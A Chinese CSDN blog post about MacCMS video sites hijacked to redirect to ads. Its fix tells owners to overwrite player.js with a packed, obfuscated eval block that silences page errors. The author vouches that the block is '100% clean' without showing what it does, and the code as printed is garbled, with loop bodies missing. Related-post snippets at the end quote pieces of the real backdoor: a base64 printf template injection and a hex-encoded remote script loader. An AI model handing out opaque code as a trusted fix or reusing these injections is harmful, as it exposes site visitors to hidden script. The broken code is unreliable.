location苹果_苹果cms播放跳转广告挂马问题彻底解决方案

最新推荐文章于 2023-11-21 14:26:42 发布
最新推荐文章于 2023-11-21 14:26:42 发布
阅读量2.4k 收藏 3
点赞数
文章标签: location苹果
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32601635/article/details/112071628
版权

2c6844003ccd6fff66da5fdbd888ea0e.png

今天早上一觉起来,看到朋友留言,打开电影站后点播放就自动跳转广告,当时第一感觉,是采集站挂马了,毕竟有过经历,然后各系列排查,竟然发现是苹果CMS系统挂马,mlgb

解决方法很简单,将下面这串代码,复制了然后替换掉系统原先的/static/js/player.js文件

var killErrors=function(value){return true};window.onerror=null;window.onerror=killErrors;var base64EncodeChars="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64encode(str){var out,i,len;var c1,c2,c3;len=str.length;i=0;out="";while(i>2);out+=base64EncodeChars.charAt((c1&0x3)<<4);out+="==";break}c2=str.charCodeAt(i++);if(i==len){out+=base64EncodeChars.charAt(c1>>2);out+=base64EncodeChars.charAt(((c1&0x3)<<4)|((c2&0xF0)>>4));out+=base64EncodeChars.charAt((c2&0xF)<<2);out+="=";break}c3=str.charCodeAt(i++);out+=base64EncodeChars.charAt(c1>>2);out+=base64EncodeChars.charAt(((c1&0x3)<<4)|((c2&0xF0)>>4));out+=base64EncodeChars.charAt(((c2&0xF)<<2)|((c3&0xC0)>>6));out+=base64EncodeChars.charAt(c3&0x3F)}return out}function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i=0x0001)&&(c<=0x007F)){out+=str.charAt(i)}else if(c>0x07FF){out+=String.fromCharCode(0xE0|((c>>12)&0x0F));out+=String.fromCharCode(0x80|((c>>6)&0x3F));out+=String.fromCharCode(0x80|((c>>0)&0x3F))}else{out+=String.fromCharCode(0xC0|((c>>6)&0x1F));out+=String.fromCharCode(0x80|((c>>0)&0x3F))}}return out}function utf8to16(str){var out,i,len,c;var char2,char3;out="";len=str.length;i=0;while(i>4){case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out+=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out+=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out+=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break}}return out}eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C c={\'1i\':9(s,n){2A 3.1e.w(\'{1b}\',s).w(\'{1b}\',s).w(\'{1a}\',n).w(\'{1a}\',n)},\'1X\':9(s,n){1U.1T=3.1i(s,n)},\'1S\':9(){$(\'#h\').H(\'i\',3.17);1P(9(){c.13()},3.U*1o);$("#D").E(0).1n=3.2C+\'\';C a=q.2y(\'Q\');a.2e=\'2b/22\';a.1R=O;a.1u=\'1t-8\';C b=q.1I(\'Q\')[0];b.1p.1r(a,b)},\'1s\':9(){d($("#h").H(\'i\')!=3.G){$("#h").H(\'i\',3.G)}$("#h").10()},\'13\':9(){$(\'#h\').2p()},\'1l\':9(){3.K=1q;$(\'#L\').10()},\'M\':9(){q.N(\'

.c{1v: #1C;1G-1H:1J;1K:#1L;1N:P;1Q:P;x:1V;1W:21;j:\'+3.l+\';f:\'+3.k+\';2q-f:2x;}.c F{j:6%;f:6%;}.c #D{x:1j;!1k;j:6%;f:6%;}

\'+\'\'+\'<1B>&1F;\');3.Z=$(\'.c\').E(0).Z;3.I=$(\'.c\').E(0).I;q.N(\'\')},\'14\':9(){},\'1O\':9(){3.K=O;3.15=\'\';d(4.16==\'1\'){4.o=y(4.o);4.m=y(4.m)}18 d(4.16==\'2\'){4.o=y(19(4.o));4.m=y(19(4.m))}3.e=1Y.1Z.20();3.l=5.j;3.k=5.f;d(3.e.7("23")>0||3.e.7("24")>0||3.e.7("25")>0||3.e.7("26")>0||3.e.7("27")>0||3.e.7("28")>0){3.l=5.29;3.k=5.2a}d(3.l.7("1c")==-1&&3.l.7("%")==-1){3.l=\'6%\'}d(3.k.7("1c")==-1&&3.k.7("%")==-1){3.k=\'6%\'}3.17=5.2c;3.G=5.h;3.U=5.2d;3.1d=4.2f;3.2g=4.2h;3.2i=4.2j;3.1e=2k(4.2l);3.g=4.2m;3.2n=4.2o;3.t=4.1f==\'B\'?\'\':4.1f;3.2r=4.o;3.2s=4.m;3.2t=4.2u;3.2v=4.2w;d(5.1g[3.t]!=1h){3.t=5.1g[3.t].2z}d(5.u[3.g]!=1h){d(5.u[3.g].2B=="1"){3.15=5.u[3.g].r==\'\'?5.r:5.u[3.g].r;3.g=\'r\'}}3.12=2D.2E+\'/2F/2G/\';d(3.1d=="2H"){c.14()}18{c.M()}}};',62,168,'|||this|player_data|MacPlayerConfig|100|indexOf||function|||MacPlayer|if|Agent|height|PlayFrom|buffer|src|width|Height|Width|url_next||url|style|document|parse||PlayServer|player_list|iframe|replace|position|unescape||id|no|var|playleft|get|table|Buffer|attr|offsetWidth|scr|Status|install|Play|write|true|0px|script|div|frameBorder|scrolling|Second|absolute|index|99998|td|offsetHeight|show|ipt|Path|AdsEnd|Down|Parse|encrypt|Prestrain|else|base64decode|nid|sid|px|Flag|Link|server|server_list|undefined|GetUrl|inherit|important|Install|class|innerHTML|1000|parentNode|false|insertBefore|AdsStart|utf|charset|background|display|none|border|cellpadding|cellspacing|tr|000000|valign|top|nbsp|font|size|getElementsByTagName|14px|color|F6F6F6|js|margin|Init|setTimeout|padding|async|Show|href|location|relative|overflow|Go|navigator|userAgent|toLowerCase|hidden|javascript|android|mobile|ipod|ios|iphone|ipad|widthmob|heightmob|text|prestrain|second|type|flag|Trysee|trysee|Points|points|decodeURIComponent|link|from|PlayNote|note|hide|min|PlayUrl|PlayUrlNext|PlayLinkNext|link_next|PlayLinkPre|link_pre|100px|createElement|des|return|ps|Html|maccms|path|static|player|down'.split('|'),0,{}))MacPlayer.Init();

此代码百分百纯净,如果实在不放心,推荐一篇文章,也是原文出处,自己照着文章步骤操作http://jump.sinaapp.com/3gdh2

bf2caff362ad949e26f3efab14cc740b.png

对了,如果感觉一个人学习很茫然,可以加入我得交流圈哟,地址:宅机吧交流群

马力的爸爸
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致
jun2016425的博客
10-30 9084
最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的. 被挂马表现: 播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js 苹果cms后台某处或者采集的资源打印奇怪的字符比如 {if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuan.
苹果CMSV10之添加QQ微信防红跳转功能
qq_19724087的博客
04-16 1426
打开//template/你的主题目录/html/public/目录下新建 browser.html文件,把下面官方代码复制粘贴 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>www.iooyun.com</title&gt...
苹果cmsV10player解密通杀.js
04-30
苹果cmsV10player解密通杀
最新解密苹果MacCms播放器playerJS 去播放广告 基于maccms8.x 2017.09.27
05-20
MacCms源文件里的player.js是加密的,加密的文件内置小广告比牛皮癣还多。 不但影响使用,且不方便修改,所以,有了解密文件,福音就来了。 下载后,在解密后的播放器文件里,自己把加密文件的外部链接换成自己的,就可以了。 代码不熟悉的,可以搜索在线JS转HTML代码工具,进行更直观的替换、修改。 基于发布日期:2017.09.27 再也不用为苹果CMS播放器代码加密问题头疼了。 好东西就是拿来分享的。 注意:文档只是把加密的东西,解密出来,广告链接并未删除,请自己换成自己的或删除吧 雨过天晴工作室制作发布 有任何需要请联系我
maccmsV8、maccmsV10 player.js文件解密与去除广告
代码技巧
05-21 4298
使用苹果cmsV8和V10系统建站,都会有一个问题,就是官方程序已把player.js文件加密。且在这个文件里内置了官方的广告js,这个广告PC端不会显示,只会在手机端显示。 苹果cms程序是免费开源的程序,只是内置了广告,假如不想加载官方的内置广告,也有办法去除掉。 我们把V8和V10的player.js文件都解密了,去掉了官方的js广告文件。已打包,不论你使用V8还是使用V10都可...
苹果cms修复player.js植入弹窗广告方法
winkexin的博客
06-18 772
某些用户反馈网上下载的苹果CMS程序含有后门,自带的player.js文件被加密了,JS文件内被植入了广告链接,会随机弹出违法广告跳转到违法网址。首先站长建议大家不要在网上随意下载苹果cms程序,苹果CMS原官网早就关闭了,现有的很多自称官方网站都是假冒盗的网站,程序基本都含有不法后门和广告。下载苹果cms源码程序可以到官网的GitHub地址下载,下载地址:httPs。
苹果CMS播放页劫持跳转解决方案
winkexin的博客
06-14 562
苹果CMS播放页预加载页面被劫持,须在后台--系统设置--播放器参数设置下将预加载广告:缓冲广告:两项的内容全部删除,本不同也相应寻找预加载和缓冲地址类似的选项删除即可。更改网站根目录/static/js/player.js下的文件,为如下内容对于v10本用户。
苹果cms最新漏洞被挂马跳转劫持及清除代码
sexrenge的博客
09-03 6132
网站被挂马跳转劫持跳转到H APP下载页。 被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转挂马图片 通过日志查看挂马过程 该漏洞是利用苹果CMS的API执行SHELL, 挂马文件在模板的jquery.min.js ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x
苹果cms程序,播放跳转的修补方法
热门推荐
小糯米的专栏
05-24 1万+
最近很多用MACCMS8.X或者是MACCMS10的苹果CMS站长发现自己的网站被跳转了,跳转到了一个读博的 经过研究发现,本身所有苹果cms播放页里面的player.js都内嵌了苹果官方的加密链接,而最近苹果cms域名被别人挂马了,每次播放播放的时候,有一定概率会加载//union.maccms.com/html/top10.js中的广告代码。这就造成所有的苹果CMS的站点全部被黑. ...
苹果cms 8x整合免签约微信支付插件 无手续费
03-13
在源代码任意位置,添加跳转代码 如果你是需要用户充值积分,那么请添加这一段代码 <script type="text/javascript">window.location.href="/pay/index.php?pay=jifen"; 如果你是需要用户充值VIP的,那么请将代码...
苹果CMS8X 豆瓣资料采集API 需要自己搭建单独的域名.rar
08-27
苹果CMS8X 豆瓣资料采集API 自己搭建单独的域名 建议使用HTTPS安全模式 把里面的index.php文件上传到新站首页 后台添加下面伪静态规则 location / { index index.php; try_files $uri @rewriteapp; } ...
ATAPESmethod.rar_APES_high_location estimation_spectral peak
07-14
High accuracy peak location and amplitude spectral estimation via tuning APES method
wsn.rar_WSN_anchor wsn_location error_location estimation_wsn ma
07-14
estimation of error performance of location of nodes with one anchor and three anchor nodes
[removed]不跳转问题解决方法
09-04
[removed]的跳转失效的情况有没有遇到过啊,这主要是冒泡传递影响了,下面有个不错的解决方法,大家可以参考下
苹果cms完美解决跳转广告问题
最新发布
香菜博客
11-21 528
用过苹果cms的站长可能都被跳转广告,真的很烦,而且网上流传着两个本的cms,都在互踩,我一直用着GitHub的blackmagic那个安装包,但是依旧被跳转,找了很多资料,发现他的player.js有一段加密代码,我是小白,看不懂,也解密不了。所以我分别下载了black Magic和maccms pro 的安装包,将maccms pro 的player.js和player config.js 里的广告代码删除,然后覆盖black Magic的两个文件,最后完美解决被跳转广告问题
phpcms 中木马快照会跳转一些非法广告页解决方法
dianketian9891的博客
07-30 464
1.在网站根目录找到一个隐藏的.htaccess文件。里面有URL 跳转的路径。此文件在win服务器中无法删除 无法 重命名。用attrib del Cacls命令都不行。 以下URL:都会跳转广告页面 /111safasf/index.html /随机字符/index.html /?zdsfasf=werwerw .htaccess文件类容 Options +Fo...
苹果cms如何去除手机端漂浮广告教程
苹果cms10好看的模板
02-15 6168
声明:除特殊声明外本站文档均由作者原创,转载请注明出处,原文地址:苹果cms如何去除手机端漂浮广告教程 我们在观看影片的时候手机底部会出现上图中的悬浮广告 这种广告一般都是解析接口加载的,去广告的方式很简单,换一个无广告的解析接口即可 这里要说明一点,大部分免费的解析接口,都可能会有广告!基本没有无广告的解析接口免费无偿的长时间给你用,要是有也是做解析初期引流的方式而已,有了流量后还...
苹果cms(maccms) player播放器解密
qq_33911195的博客
08-21 6190
我想大伙儿近来假如用到苹果CMS(maccms) ,无论是V8还是V10本号 ,都碰到了一定的程度的后门源代码 。 其相关文件也就是 /static/js /player.js文件,每当播放播放视频的时候 ,有一定的几率会加载 //union.maccms.com/html/top10.js中的js广告代码 。 该player.js文件是加密源代码 ,必须要先解密该文件,之后再次把加载广告的JS源代码删去后,重新上传就可以防止这个播放器JS相关文件挂马留后门的情况 。 假如想自己修改删去源代码的朋友们
微信浏览器window.location.href跳转无反应怎么解决
07-28
如果在微信浏览器中使用`window.location.href`进行页面跳转时没有反应,可以尝试以下几种方法来解决问题: 1. 检查代码逻辑:确保在调用`window.location.href`之前没有其他操作阻止了页面跳转,例如表单验证、异步请求等。可以使用浏览器开发者工具查看控制台是否有错误信息。 2. 使用`location.replace`替代`window.location.href`:尝试使用`location.replace`方法来替代`window.location.href`,例如:`location.replace(url)`。这个方法会替换当前页面的历史记录,可以避免一些页面跳转相关的问题。 3. 检查是否被微信浏览器拦截:微信浏览器可能会对某些页面跳转进行拦截,特别是跳转到其他域名或非安全的链接。确保要跳转的链接是合法的、安全的,并且没有被微信浏览器拦截。 4. 使用其他跳转方式:如果以上方法都没有解决问题,可以考虑使用其他跳转方式,例如使用`window.open`打开新窗口或使用后端重定向来进行页面跳转。 如果以上方法都没有解决问题,可以提供更多的代码和详细的错误信息,以便更好地帮助解决。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值